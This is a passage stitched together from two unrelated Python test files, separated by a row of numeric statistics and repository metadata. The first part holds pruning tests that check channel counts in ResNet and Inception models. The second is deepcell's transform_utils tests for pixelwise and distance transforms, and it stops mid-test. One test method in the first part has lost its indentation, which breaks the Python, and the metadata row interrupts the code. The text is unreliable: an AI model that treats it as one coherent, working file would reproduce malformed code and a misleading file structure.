        self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
        self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
        # layer2.1.conv2 input channels pruned from 128 --> 125
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
        self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
        self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
        # layer3.1.conv2 input channels pruned from 256 --> 245
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
        self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
        self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
        # layer4.0.conv1 input channels pruned from 256 --> 245
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 245)
        self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 245, 3, 3])
        # layer4.1.conv2 input channels pruned from 512 --> 501
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
        self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
        self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
    def test_winnowing_multiple_zeroed_resnet50(self):
        """ Tests winnowing resnet50 with multiple layers with zero planes. """
        model = models.resnet50(pretrained=False)
        model.eval()
        input_shape = [1, 3, 224, 224]
        list_of_modules_to_winnow = []
        # Collect (module, input-channel indices to prune) pairs, deepest layer first.
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
        input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
        list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [33, 44, 55]
        list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
        input_channels_to_prune = [11, 12, 13, 14, 15]
        list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
        input_channels_to_prune = [55, 56, 57, 58, 59]
        list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
        input_channels_to_prune = [42, 44, 46]
        list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        # compare zeroed out and pruned model output
        # use double precision for lower absolute error
        input_tensor = torch.rand(input_shape).double()
        model.double()
        model.eval()
        validation_output = model(input_tensor)
        # validate winnowed net
        new_model.double()
        new_model.eval()
        test_output = new_model(input_tensor)
        self.assertTrue(test_output.shape == validation_output.shape)
        # layer1.0.conv2 input channels pruned from 64 --> 61
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
        self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
        self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
        # layer1.1.conv1 input channels pruned from 256 --> 251 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
        self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
        # layer2.0.conv2 input channels pruned from 128 --> 123
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
        self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
        self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
        # layer2.1.conv2 input channels pruned from 128 --> 125
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
        self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
        self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
        # layer3.1.conv2 input channels pruned from 256 --> 245
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
        self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
        self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
        # layer4.0.conv1 input channels pruned from 1024 --> 1013 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
        self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
        # layer4.1.conv2 input channels pruned from 512 --> 501
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
        self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
        self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
    def test_winnowing_multiple_zeroed_resnet101(self):
        """ Tests winnowing resnet101 with multiple layers with zero planes. """
        model = models.resnet101(pretrained=False)
        model.eval()
        input_shape = [1, 3, 224, 224]
        list_of_modules_to_winnow = []
        # For layer4[1].conv2 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
        # For layer4[0].conv1 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
        # For layer3[1].conv2 layer, zero out input channels 15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9
        input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
        list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
        # For layer2[1].conv2 layer, zero out input channels 33, 44, 55
        input_channels_to_prune = [33, 44, 55]
        list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
        # For layer2[0].conv2 layer, zero out input channels 11, 12, 13, 14, 15
        input_channels_to_prune = [11, 12, 13, 14, 15]
        list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
        # For layer1[1].conv1 layer, zero out input channels 55, 56, 57, 58, 59
        input_channels_to_prune = [55, 56, 57, 58, 59]
        list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
        # For layer1[0].conv2 layer, zero out input channels 42, 44, 46
        input_channels_to_prune = [42, 44, 46]
        list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
        # Call the Winnow API.
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        input_tensor = torch.rand(input_shape).double()
        model.double()
        model.eval()
        validation_output = model(input_tensor)
        # validate winnowed net
        new_model.double()
        new_model.eval()
        test_output = new_model(input_tensor)
        self.assertTrue(test_output.shape == validation_output.shape)
        # layer1.0.conv2 input channels pruned from 64 --> 61
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
        self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
        self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
        # layer1.1.conv1 input channels pruned from 256 --> 251 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
        self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
        # layer2.0.conv2 input channels pruned from 128 --> 123
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
        self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
        self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
        # layer2.1.conv2 input channels pruned from 128 --> 125
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
        self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
        self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
        # layer3.1.conv2 input channels pruned from 256 --> 245
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
        self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
        self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
        # layer4.0.conv1 input channels pruned from 1024 --> 1013 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
        self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
        # layer4.1.conv2 input channels pruned from 512 --> 501
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
        self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
        self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
    def test_winnowing_multiple_zeroed_resnet152(self):
        """ Tests winnowing resnet152 with multiple layers with zero planes. """
        model = models.resnet152(pretrained=False)
        model.eval()
        # Test forward pass on the copied model before zeroing out channels in any layer.
        input_shape = [1, 3, 224, 224]
        list_of_modules_to_winnow = []
        # For layer4[1].conv2 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
        # For layer4[0].conv1 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54
        input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
        list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
        # For layer3[1].conv2 layer, zero out input channels 15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9
        input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
        list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
        # For layer2[1].conv2 layer, zero out input channels 33, 44, 55
        input_channels_to_prune = [33, 44, 55]
        list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
        # For layer2[0].conv2 layer, zero out input channels 11, 12, 13, 14, 15
        input_channels_to_prune = [11, 12, 13, 14, 15]
        list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
        # For layer1[1].conv1 layer, zero out input channels 55, 56, 57, 58, 59
        input_channels_to_prune = [55, 56, 57, 58, 59]
        list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
        # For layer1[0].conv2 layer, zero out input channels 42, 44, 46
        input_channels_to_prune = [42, 44, 46]
        list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
        # Call the Winnow API.
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        # compare zeroed out and pruned model output:
        # use double precision for lower absolute error
        input_tensor = torch.rand(input_shape).double()
        model.double()
        model.eval()
        validation_output = model(input_tensor)
        # validate winnowed net
        new_model.double()
        new_model.eval()
        test_output = new_model(input_tensor)
        self.assertTrue(test_output.shape == validation_output.shape)
        # layer1.0.conv2 input channels pruned from 64 --> 61
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
        self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
        self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
        # layer1.1.conv1 input channels pruned from 256 --> 251 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
        self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
        # layer2.0.conv2 input channels pruned from 128 --> 123
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
        self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
        self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
        # layer2.1.conv2 input channels pruned from 128 --> 125
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
        self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
        self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
        # layer3.1.conv2 input channels pruned from 256 --> 245
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
        self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
        self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
        # layer4.0.conv1 input channels pruned from 1024 --> 1013 (bottleneck: 1x1 kernel)
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
        self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
        # layer4.1.conv2 input channels pruned from 512 --> 501
        # weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
        self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
        self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
        self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
    def test_inception_model_conv_below_conv(self):
        """ Test winnowing inception model conv below conv """
        # These modules are included as a hack to allow tests using inception model to pass,
        # as the model uses functionals instead of modules.
        OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
        model = models.Inception3()
        model.eval()
        input_shape = [1, 3, 299, 299]
        # Prune 8 input channels of branch3x3dbl_2.conv; the conv directly above it
        # (branch3x3dbl_1.conv) should lose the matching 8 output channels.
        input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
        list_of_modules_to_winnow = [(model.Mixed_5b.branch3x3dbl_2.conv, input_channels_to_prune)]
        print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        # Upstream conv output channels reduced by the 8 pruned channels: 64 --> 56.
        self.assertEqual(new_model.Mixed_5b.branch3x3dbl_1.conv.out_channels, 56)
        self.assertEqual(list(new_model.Mixed_5b.branch3x3dbl_1.conv.weight.shape), [56, 192, 1, 1])
        del model
        del new_model
def test_inception_model_conv_below_split(self):
""" Test winnowing inception model with conv below split """
# These modules are included as a hack to allow tests using inception model to pass,
# as the model uses functionals instead of modules.
OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch3x3dbl_1.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
del model
del new_model
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch1x1.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
del model
del new_model
self.assertEqual(0, 0)
    def test_inception_model_conv_below_avgpool(self):
        """ Test winnowing inception model with conv below avgpool """
        # These modules are included as a hack to allow tests using inception model to pass,
        # as the model uses functionals instead of modules.
        OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
        OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
        model = models.Inception3()
        model.eval()
        input_shape = [1, 3, 299, 299]
        # Prune 8 input channels of the branch_pool conv (which sits below an avgpool).
        input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
        list_of_modules_to_winnow = [(model.Mixed_5b.branch_pool.conv, input_channels_to_prune)]
        print(model.Mixed_5b.branch_pool.conv)
        print(model.Mixed_5b.branch_pool.conv.out_channels, model.Mixed_5b.branch_pool.conv.in_channels)
        # Call the Winnow API.
        new_model, _ = winnow_model(model, input_shape,
                                    list_of_modules_to_winnow,
                                    reshape=True, in_place=False, verbose=True)
        # Conv input channels reduced from 192 --> 184; output channel count stays 32.
        self.assertEqual(new_model.Mixed_5b.branch_pool.conv[1].out_channels, 32)
        self.assertEqual(list(new_model.Mixed_5b.branch_pool.conv[1].weight.shape), [32, 184, 1, 1])
        del model
        del new_model
| 51.01145
| 104
| 0.669547
| 3,689
| 26,730
| 4.633776
| 0.081052
| 0.048672
| 0.05616
| 0.07488
| 0.905932
| 0.898561
| 0.891541
| 0.882356
| 0.872762
| 0.870364
| 0
| 0.081712
| 0.215264
| 26,730
| 523
| 105
| 51.108987
| 0.733219
| 0.299514
| 0
| 0.882784
| 0
| 0
| 0.009224
| 0
| 0
| 0
| 0
| 0
| 0.311355
| 1
| 0.025641
| false
| 0
| 0.018315
| 0
| 0.047619
| 0.018315
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
11312f55bfe57e8bcecfc32f11fdb8175ac90757
| 20,219
|
py
|
Python
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 250
|
2018-09-19T23:55:06.000Z
|
2022-03-30T02:20:52.000Z
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 251
|
2018-09-21T17:09:43.000Z
|
2022-02-28T19:04:50.000Z
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 64
|
2018-11-29T15:22:15.000Z
|
2022-03-21T03:37:43.000Z
|
# Copyright 2016-2021 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for transform_utils"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from skimage.measure import label
from tensorflow.python.platform import test
from tensorflow.keras import backend as K
from deepcell.utils import transform_utils
def _get_image(img_h=300, img_w=300):
bias = np.random.rand(img_w, img_h) * 64
variance = np.random.rand(img_w, img_h) * (255 - 64)
img = np.random.rand(img_w, img_h) * variance + bias
return img
def _generate_test_masks():
img_w = img_h = 30
mask_images = []
for _ in range(8):
imarray = np.random.randint(2, size=(img_w, img_h, 1))
mask_images.append(imarray)
return mask_images
class TransformUtilsTest(test.TestCase):
    def test_pixelwise_transform_2d(self):
        """Pixelwise transform of 2D label masks: checks the number of output
        channels (3 without / 4 with separate edge classes), that the non-background
        channels exactly cover the foreground, and that dilation grows the mask area."""
        with self.cached_session():
            K.set_image_data_format('channels_last')
            # test single edge class
            for img in _generate_test_masks():
                img = label(img)
                img = np.squeeze(img)
                pw_img = transform_utils.pixelwise_transform(
                    img, data_format=None, separate_edge_classes=False)
                pw_img_dil = transform_utils.pixelwise_transform(
                    img, dilation_radius=1,
                    data_format='channels_last',
                    separate_edge_classes=False)
                self.assertEqual(pw_img.shape[-1], 3)
                self.assertEqual(pw_img_dil.shape[-1], 3)
                # channels 0 + 1 together must equal the foreground mask
                assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1],
                                       img > 0)))
                # dilation must strictly increase the covered area
                self.assertGreater(
                    pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
                    pw_img[..., 0].sum() + pw_img[..., 1].sum())
            # test separate edge classes
            for img in _generate_test_masks():
                img = label(img)
                img = np.squeeze(img)
                pw_img = transform_utils.pixelwise_transform(
                    img, data_format=None, separate_edge_classes=True)
                pw_img_dil = transform_utils.pixelwise_transform(
                    img, dilation_radius=1,
                    data_format='channels_last',
                    separate_edge_classes=True)
                self.assertEqual(pw_img.shape[-1], 4)
                self.assertEqual(pw_img_dil.shape[-1], 4)
                # channels 0 + 1 + 2 together must equal the foreground mask
                assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] +
                                       pw_img[..., 2], img > 0)))
                self.assertGreater(
                    pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
                    pw_img[..., 0].sum() + pw_img[..., 1].sum())
    def test_pixelwise_transform_3d(self):
        """Pixelwise transform on stacks of repeated 2D masks (10 frames each):
        same channel-count / coverage / dilation checks as the 2D test."""
        frames = 10
        img_list = []
        # Build one (frames, h, w, 1) stack per mask by repeating the frame.
        for img in _generate_test_masks():
            frame_list = []
            for _ in range(frames):
                frame_list.append(label(img))
            img_stack = np.array(frame_list)
            img_list.append(img_stack)
        with self.cached_session():
            K.set_image_data_format('channels_last')
            # test single edge class
            maskstack = np.vstack(img_list)
            batch_count = maskstack.shape[0] // frames
            # regroup the flat frame axis into (batch, frames, ...)
            new_shape = tuple([batch_count, frames] +
                              list(maskstack.shape[1:]))
            maskstack = np.reshape(maskstack, new_shape)
            for i in range(maskstack.shape[0]):
                img = maskstack[i, ...]
                img = np.squeeze(img)
                pw_img = transform_utils.pixelwise_transform(
                    img, data_format=None, separate_edge_classes=False)
                pw_img_dil = transform_utils.pixelwise_transform(
                    img, dilation_radius=2,
                    data_format='channels_last',
                    separate_edge_classes=False)
                self.assertEqual(pw_img.shape[-1], 3)
                self.assertEqual(pw_img_dil.shape[-1], 3)
                # channels 0 + 1 together must equal the foreground mask
                assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1],
                                       img > 0)))
                self.assertGreater(
                    pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
                    pw_img[..., 0].sum() + pw_img[..., 1].sum())
            # test separate edge classes
            maskstack = np.vstack(img_list)
            batch_count = maskstack.shape[0] // frames
            new_shape = tuple([batch_count, frames] +
                              list(maskstack.shape[1:]))
            maskstack = np.reshape(maskstack, new_shape)
            for i in range(maskstack.shape[0]):
                img = maskstack[i, ...]
                img = np.squeeze(img)
                pw_img = transform_utils.pixelwise_transform(
                    img, data_format=None, separate_edge_classes=True)
                pw_img_dil = transform_utils.pixelwise_transform(
                    img, dilation_radius=2,
                    data_format='channels_last',
                    separate_edge_classes=True)
                self.assertEqual(pw_img.shape[-1], 4)
                self.assertEqual(pw_img_dil.shape[-1], 4)
                # channels 0 + 1 + 2 together must equal the foreground mask
                assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] +
                                       pw_img[..., 2], img > 0)))
                self.assertGreater(
                    pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
                    pw_img[..., 0].sum() + pw_img[..., 1].sum())
def test_outer_distance_transform_2d(self):
for img in _generate_test_masks():
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 3
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
bins = 4
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=-1).shape,
img.shape)
K.set_image_data_format('channels_first')
img = np.rollaxis(img, -1, 1)
bins = None
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 3
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
bins = 4
distance = transform_utils.outer_distance_transform_2d(img,
bins=bins)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape)
def test_outer_distance_transform_3d(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_3d(unique,
bins=bins)
distance = np.expand_dims(distance, axis=1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
def test_outer_distance_transform_movie(self):
mask_stack = np.array(_generate_test_masks())
unique = np.zeros(mask_stack.shape)
for i, mask in enumerate(_generate_test_masks()):
unique[i] = label(mask)
K.set_image_data_format('channels_last')
bins = None
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape)
bins = 3
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2]))
self.assertEqual(distance.shape, unique.shape)
bins = 4
distance = transform_utils.outer_distance_transform_movie(unique,
bins=bins)
distance = np.expand_dims(distance, axis=-1)
self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3]))
self.assertEqual(distance.shape, unique.shape)
K.set_image_data_format('channels_first')
unique = np.rollaxis(unique, -1, 1)
bins = None
